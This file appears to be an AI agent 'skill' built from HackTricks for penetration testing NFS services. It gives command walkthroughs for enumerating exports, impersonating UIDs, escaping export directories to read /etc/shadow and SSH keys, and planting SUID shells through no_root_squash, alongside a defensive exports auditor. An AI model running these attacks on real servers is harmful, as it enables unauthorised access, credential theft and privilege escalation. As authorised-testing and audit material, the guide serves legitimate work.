Hacktricks-skills nfs-pentesting
Pentest NFS (Network File System) services on port 2049. Use this skill whenever the user mentions NFS, network file sharing, port 2049, showmount, nfs exports, or needs to enumerate/mount/exploit NFS shares. This skill helps with NFS enumeration, mounting shares, exploiting misconfigurations like no_root_squash, escaping export directories, and privilege escalation via NFS.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/network-services-pentesting/nfs-service-pentesting/SKILL.MD
NFS Pentesting Skill
A comprehensive guide for pentesting NFS (Network File System) services, covering enumeration, exploitation, and privilege escalation techniques.
When to Use This Skill
Use this skill when:
- You need to enumerate NFS shares on a target
- You want to mount NFS shares for access
- You're investigating NFS misconfigurations
- You need to exploit NFS for privilege escalation
- Port 2049 is open on a target
- The user mentions NFS, showmount, nfs exports, or network file sharing
Quick Reference
```bash
# Basic enumeration
showmount -e <IP>
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 <IP>

# Mount a share
mount -t nfs -o vers=2 <IP>:/share /mnt/local -o nolock

# Check for dangerous configurations
nfs_analyze <IP>
```
NFS Basics
What is NFS?
NFS (Network File System) is a client/server protocol that enables users to access files over a network as if they were local. Key characteristics:
- Default port: 2049/TCP/UDP
- Authentication: Typically relies on UNIX UID/GID identifiers
- Security concern: Client-provided user information is trusted by the server
- Root impersonation: By default, UID 0 (root) is squashed to prevent root access
NFS Versions
| Version | Characteristics |
|---|---|
| NFSv2 | Oldest, UDP-based, no authentication/authorization |
| NFSv3 | Enhanced error reporting, variable file sizes |
| NFSv4 | Kerberos support, firewall-friendly, stateful, ACL support |
Important: NFSv2 is preferred for pentesting due to lack of authentication requirements.
Squashing Behavior
| Setting | Effect |
|---|---|
| all_squash | All users mapped to nobody (UID 65534) |
| root_squash | Default - only UID 0 squashed to nobody |
| no_root_squash | Root access preserved - DANGEROUS |
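As an added illustration, not code from the HackTricks page or from nfs-security-tooling, a small Python model of the three squash settings above (using the default anonymous ID 65534); it also checks the mapped identity against a 0640 root:shadow file (GID 42 on Debian, as the export-escape section notes), which shows that root_squash leaves client-chosen group IDs untouched and only all_squash removes them from the check.

```python
# Added example, not code from the HackTricks page or nfs-security-tooling:
# a model of how nfsd maps the UID/GID a client presents over AUTH_SYS,
# depending on the export's squash option. 65534 is the default anonuid/anongid.
ANON_ID = 65534


def effective_ids(uid, gid, groups, opts):
    """Return the (uid, gid, groups) the server uses for its permission check.

    opts is the export's option set, e.g. {"rw", "no_root_squash"}.
    all_squash     -> every identity becomes the anonymous user/group
    no_root_squash -> nothing is remapped
    otherwise      -> root_squash (the default): only ID 0 is remapped
    """
    if "all_squash" in opts:
        return ANON_ID, ANON_ID, [ANON_ID]
    if "no_root_squash" in opts:
        return uid, gid, list(groups)

    def squash(i):
        return ANON_ID if i == 0 else i

    return squash(uid), squash(gid), [squash(g) for g in groups]


# /etc/shadow on Debian: root:shadow, mode 0640 (owner UID 0, group GID 42)
SHADOW_OWNER, SHADOW_GROUP = 0, 42


def shadow_readable(uid, gid, groups, opts):
    """True if the mapped identity passes the 0640 root:shadow permission check."""
    euid, egid, egroups = effective_ids(uid, gid, groups, opts)
    return euid == SHADOW_OWNER or SHADOW_GROUP in (egid, *egroups)
```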
Enumeration
Step 1: Basic Enumeration with showmount
```bash
# List available exports
showmount -e <IP>

# List all information
showmount <IP>
```
Example output:
```
Export list for 10.12.0.150:
/backup 192.168.0.0/24
/home   10.0.0.0/8
```
Step 2: Nmap Scripts
```bash
# Comprehensive NFS enumeration
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 <IP>

# Individual scripts
nmap --script=nfs-ls -p 2049 <IP>         # List exports and permissions
nmap --script=nfs-showmount -p 2049 <IP>  # Like showmount -e
nmap --script=nfs-statfs -p 2049 <IP>     # Disk statistics
```
Step 3: Advanced Analysis with nfs_analyze
The nfs_analyze tool from hvs-consulting/nfs-security-tooling provides comprehensive analysis:
```bash
# Install
pip install nfs-security-tooling

# Run analysis
nfs_analyze <IP>
```
This tool checks for:
- Available mounts
- Supported NFS versions
- Connected IPs
- Export escape possibilities
- no_root_squash configuration
Step 4: Metasploit Scanner
```
# In msfconsole
use scanner/nfs/nfsmount
set RHOSTS <IP>
run
```
Mounting NFS Shares
Basic Mount
```bash
# Create local mount point
mkdir -p /mnt/nfs_target

# Mount the share (prefer NFSv2 for pentesting)
mount -t nfs -o vers=2 <IP>:/remote/path /mnt/nfs_target -o nolock

# Example
mount -t nfs -o vers=2 10.12.0.150:/backup /mnt/nfs_target -o nolock
```
Mount Options Explained
| Option | Purpose |
|---|---|
| -t nfs | Specify NFS filesystem type |
| -o vers=2 | Use NFSv2 (no authentication) |
| -o nolock | Disable locking (useful for pentesting) |
| rsize= / wsize= | Optimize transfer size |
Verify Mount
```bash
# Check mounted filesystems
mount | grep nfs

# List NFS mounts
showmount -a <IP>
```
Exploitation Techniques
Technique 1: UID/GID Impersonation
NFS trusts client-provided UID/GID values. Exploit this by:
1. Identify target file ownership:
   ```bash
   ls -la /mnt/nfs_target/   # Note the UID of files you want to access
   ```
2. Create local user with matching UID:
   ```bash
   # If file is owned by UID 1001
   useradd -u 1001 pentest_user
   su - pentest_user
   ```
3. Access the files:
   ```bash
   cd /mnt/nfs_target/   # Now you can access files owned by UID 1001
   ```
Technique 2: Using fuse_nfs
The fuse_nfs tool automatically sends the correct UID/GID:
```bash
# Install
pip install nfs-security-tooling

# Use fuse_nfs to access files
fuse_nfs <IP>:/export /mnt/local
```
Technique 3: Export Directory Escape
If subtree_check is disabled (default on Linux), you can escape the export directory:
```bash
# If /srv is exported but /var is on the same filesystem
cd /mnt/nfs_target/
cd ../../var/log/   # Escape to /var/log

# Read sensitive files
cat /etc/shadow
cat /var/log/auth.log
```
Why this works:
- /etc/shadow is owned by root:shadow (GID 42 on Debian)
- Only UID 0 is squashed by default
- Group access is not restricted
Technique 4: no_root_squash Exploitation
If no_root_squash is enabled:
```bash
# Mount as root
mount -t nfs -o vers=2 <IP>:/share /mnt/nfs_target -o nolock

# You now have root access to the share
cd /mnt/nfs_target/
# Create SUID binaries, modify files, etc.
```
Technique 5: Using NFSShell
NFSShell simplifies NFS exploitation:
```bash
# Install
git clone https://github.com/NetDirect/nfsshell
cd nfsshell
python3 nfsshell.py

# Usage
nfsshell <IP>:/export
```
Features:
- Easy listing and mounting
- UID/GID manipulation
- File access automation
Privilege Escalation
Via no_root_squash
1. Mount with root access:
   ```bash
   mount -t nfs -o vers=2 <IP>:/share /mnt/nfs_target -o nolock
   ```
2. Create SUID binary:
   ```bash
   cp /bin/bash /mnt/nfs_target/bash_suid
   chmod 4755 /mnt/nfs_target/bash_suid
   ```
3. Execute from target:
   ```bash
   # On the NFS server: the file sits in the exported directory (/share here),
   # not under the client's mount point
   /share/bash_suid -p
   ```
Via UID Matching
1. Find high-privilege files:
   ```bash
   find /mnt/nfs_target -uid 0 -type f 2>/dev/null
   ```
2. Match UID locally:
   ```bash
   useradd -o -u 0 root_clone   # If no_root_squash (-o allows a duplicate UID)
   # Or match a specific UID
   useradd -u 1000 target_user
   ```
3. Access and modify:
   ```bash
   su - target_user
   # Modify files, create backdoors, etc.
   ```
Dangerous NFS Settings
| Setting | Risk | Detection |
|---|---|---|
| rw | Read/write access | Check exports |
| insecure | Allows ports >1024 | Check exports |
| no_root_squash | Root access preserved | nfs_analyze |
| no_all_squash | All UIDs preserved | nfs_analyze |
| nohide | Nested FS visible | Check exports |
| subtree_check disabled | Export escape possible | nfs_analyze |
Configuration Files
On the NFS server, check:
```bash
# Main exports configuration
/etc/exports

# NFS state information (the table of currently exported filesystems)
/var/lib/nfs/etab
```
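An added example (not code from the HackTricks page): a small auditor for /etc/exports text that reports, per client entry, the dangerous settings from the table above plus wide client specs; the sample file and the finding codes are constructed for this illustration.

```python
import ipaddress
import re

# Added example, not code from the HackTricks page: audit /etc/exports text
# for the dangerous settings listed in the table above. The sample is constructed.
SAMPLE_EXPORTS = """\
# constructed sample, not taken from any real server
/srv/backup  192.168.0.0/24(rw,sync,no_subtree_check)
/home        10.0.0.0/8(rw,no_root_squash,insecure)
/srv/pub     *(ro,all_squash,sync)
/srv/nested  10.1.2.3(rw,nohide)
"""

# one client spec followed by an optional "(opt,opt,...)" group glued to it
ENTRY_RE = re.compile(r"([^\s(]+)(?:\(([^)]*)\))?")


def client_is_wide(client):
    """Wildcards or a CIDR prefix shorter than /24 count as a wide client spec."""
    if "*" in client or "?" in client:
        return True
    try:
        return ipaddress.ip_network(client, strict=False).prefixlen < 24
    except ValueError:
        return False  # hostname or @netgroup: not judged by this check


def audit_entry(client, opts):
    """Finding codes for one client(options) entry, named after the table rows."""
    findings = [o for o in ("rw", "insecure", "no_root_squash", "nohide") if o in opts]
    if "all_squash" not in opts:        # client-supplied UIDs/GIDs are trusted
        findings.append("no_all_squash")
    if "subtree_check" not in opts:     # Linux default: export escape possible
        findings.append("no_subtree_check")
    if client_is_wide(client):          # wildcard or a network wider than /24
        findings.append("wide_client")
    return findings


def audit_exports(text):
    """Parse /etc/exports text and return (path, client, findings) per entry."""
    results = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, rest = (line.split(None, 1) + [""])[:2]
        for client, opts in ENTRY_RE.findall(rest):
            optset = {o.strip() for o in opts.split(",") if o.strip()}
            results.append((path, client, audit_entry(client, optset)))
    return results
```

Run it against a copy of the server's /etc/exports; an entry that combines wide_client with rw or no_root_squash is the one to fix first.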
Common Attack Scenarios
Scenario 1: Initial Access via NFS
```bash
# 1. Enumerate
showmount -e 10.10.10.180

# 2. Mount
mkdir -p /mnt/nfs
mount -t nfs -o vers=2 10.10.10.180:/home /mnt/nfs -o nolock

# 3. Check file ownership
ls -la /mnt/nfs/

# 4. Match UID if needed
useradd -u 1000 pentest
su - pentest

# 5. Access files
cd /mnt/nfs/
cat .ssh/id_rsa
```
Scenario 2: Privilege Escalation
```bash
# 1. Check for no_root_squash
nfs_analyze 10.10.10.180

# 2. If enabled, mount as root
mount -t nfs -o vers=2 10.10.10.180:/share /mnt/nfs -o nolock

# 3. Create SUID binary (the kernel ignores SUID on scripts, so copy a binary,
#    as in the privilege-escalation section above)
cp /bin/bash /mnt/nfs/shell
chmod 4755 /mnt/nfs/shell

# 4. Trigger from target
# (requires access to target system)
```
Scenario 3: Export Escape
```bash
# 1. Mount exported directory
mount -t nfs -o vers=2 10.10.10.180:/srv /mnt/nfs -o nolock

# 2. Escape to parent filesystem
cd /mnt/nfs/../../etc/

# 3. Read sensitive files
cat shadow
cat passwd

# 4. Check for writable directories
find /mnt/nfs/../../var -writable 2>/dev/null
```
Tools Summary
| Tool | Purpose | Installation |
|---|---|---|
| showmount | Basic enumeration | nfs-common (Debian) / nfs-utils (RHEL) package |
| Nmap NSE scripts | Advanced enumeration | Built-in |
| nfs_analyze | Comprehensive analysis | pip install nfs-security-tooling |
| fuse_nfs | UID/GID manipulation | pip install nfs-security-tooling |
| NFSShell | Interactive exploitation | git clone https://github.com/NetDirect/nfsshell |
| Metasploit | Automated scanning | Built-in |
Best Practices
- Always try NFSv2 first - No authentication required
- Check for no_root_squash - Most impactful misconfiguration
- Test export escape - Default on Linux
- Match UIDs - Access files owned by specific users
- Use nfs_analyze - Comprehensive vulnerability detection
- Document findings - Track which techniques worked